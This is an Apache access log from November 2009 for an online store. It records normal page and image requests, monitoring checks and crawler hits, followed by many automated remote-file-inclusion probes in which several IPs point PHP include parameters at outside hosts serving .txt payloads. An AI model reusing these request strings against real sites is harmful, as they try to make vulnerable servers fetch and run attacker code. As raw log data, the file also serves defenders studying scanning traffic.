66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:14 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:15 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:25 -0500] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
209.59.12.99 - - [26/Nov/2009:02:38:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.30.149.221 - - [26/Nov/2009:02:38:45 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.30.149.221 - - [26/Nov/2009:02:38:46 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1143BD5E81E1B000575C08C+M37+ENG HTTP/1.1" 200 38026 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
67.195.114.54 - - [26/Nov/2009:02:38:53 -0500] "GET /logs/error_log.Q109051200 HTTP/1.0" 200 4570374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.98.136.21 - - [26/Nov/2009:02:40:49 -0500] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:02:40:58 -0500] "GET /logs/access_log.Q109051200%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.172.33.230 - - [26/Nov/2009:02:41:46 -0500] "GET /logs/access_log.Q109082100//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:28 -0500] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:28 -0500] "GET /logs/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:31 -0500] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:32 -0500] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:32 -0500] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:32 -0500] "GET /logs/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:32 -0500] "GET /logs/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:33 -0500] "GET /logs/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:48 -0500] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:49 -0500] "GET /logs/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:56 -0500] "GET /logs/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:42:57 -0500] "GET /errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:43:44 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.139.67.116 - - [26/Nov/2009:02:43:47 -0500] "GET /logs/access_log.Q109051200/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:43:59 -0500] "GET /logs/access_log.Q109051200%20%20/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:44:10 -0500] "GET /logs/access_log.Q109051200/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.139.67.116 - - [26/Nov/2009:02:44:22 -0500] "GET /logs/access_log.Q109051200%20%20/errors.php?error=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
202.122.19.24 - - [26/Nov/2009:02:45:54 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
202.122.19.24 - - [26/Nov/2009:02:45:54 -0500] "GET /logs/error_log.Q109060800///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.122.19.24 - - [26/Nov/2009:02:45:55 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
202.122.19.24 - - [26/Nov/2009:02:45:55 -0500] "GET /logs/error_log.Q109060800///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.122.19.24 - - [26/Nov/2009:02:45:54 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt??? HTTP/1.1" 200 27554 "-" "Mozilla/5.0"
202.122.19.24 - - [26/Nov/2009:02:45:55 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt??? HTTP/1.1" 200 27554 "-" "Mozilla/5.0"
82.98.136.21 - - [26/Nov/2009:02:46:01 -0500] "GET /logs/access_log.Q109082100//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.austria-skitest.com/snowkids/baner.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:47:47 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:47:47 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:47:47 -0500] "GET /logs/access_log.Q109082100%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:47:52 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:47:53 -0500] "GET /logs/access_log.Q109082100%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:47:53 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:48:07 -0500] "GET /logs/error_log.Q109092200%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:48:12 -0500] "GET /logs/error_log.Q109092200%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:48:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.54 - - [26/Nov/2009:02:50:32 -0500] "GET /logs/error_log.Q109051300 HTTP/1.0" 200 4525198 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.55.143.249 - - [26/Nov/2009:02:52:07 -0500] "GET /logs/access_log.Q109092200//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:37 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:37 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:44 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:44 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:47 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:47 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:57 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:52:57 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:25 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:25 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:26 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:26 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.55.143.249 - - [26/Nov/2009:02:53:31 -0500] "GET /logs/access_log.Q109092200//tools/send_reminders.php?noSet=0&includedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Nov/2009:02:53:40 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
93.190.48.203 - - [26/Nov/2009:02:53:48 -0500] "GET /logs//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:48 -0500] "GET //errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:49 -0500] "GET //errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:49 -0500] "GET /logs//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:52 -0500] "GET //errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:53:52 -0500] "GET /logs//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
66.249.65.67 - - [26/Nov/2009:02:55:31 -0500] "GET /images/items/index5_plstcfill.jpg HTTP/1.1" 200 2179 "-" "Googlebot-Image/1.0"
93.190.48.203 - - [26/Nov/2009:02:56:03 -0500] "GET /logs//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:03 -0500] "GET //errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:23 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:23 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:23 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:28 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:28 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:28 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:37 -0500] "GET //errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:37 -0500] "GET /logs//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:44 -0500] "GET //errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:56:44 -0500] "GET /logs//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:57:10 -0500] "GET /logs/access_log.Q109060400//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:57:14 -0500] "GET /logs/access_log.Q109060400//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:02:57:24 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:02:57:24 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.95.231.98 - - [26/Nov/2009:02:57:24 -0500] "GET /logs/error_log.Q109061600%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:57:39 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:57:39 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:57:43 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:57:43 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:06 -0500] "GET /logs//errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:06 -0500] "GET //errors.php?error=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:21 -0500] "GET /logs/access_log.Q109051800//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:21 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:21 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:21 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:21 -0500] "GET /logs/access_log.Q109051800//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:21 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:36 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:36 -0500] "GET /logs/access_log.Q109051800%20%20//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:36 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:36 -0500] "GET //pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:36 -0500] "GET /logs//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:36 -0500] "GET /logs/access_log.Q109051800%20%20//pollphp/textfile//admin/common.inc.php?base_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
93.190.48.203 - - [26/Nov/2009:02:58:42 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.energoss.net/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
